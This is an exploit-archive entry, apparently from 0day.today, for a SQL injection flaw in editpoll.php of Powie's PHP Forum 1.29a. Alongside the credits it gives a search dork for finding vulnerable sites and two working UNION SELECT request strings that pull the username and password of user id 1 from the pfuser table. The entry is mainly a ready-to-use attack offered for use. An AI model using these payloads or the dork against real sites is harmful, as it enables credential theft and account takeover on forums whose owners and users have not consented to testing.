id: 1174
date: 11/17/2006
title: Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability
author: SHiKaA
cves: 

=================================================================
Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability
=================================================================



#==============================================================================================
#Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.powie.de    
#                                                                     
#Version : v1.29a
#
#===============================================================================================
#
#DORK : "pForum 1.29a"  // ""Powie's PSCRIPT Forum 1.26"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#FOR USER : editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
#FOR PASS : editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================




#  0day.today [2023-03-26]  #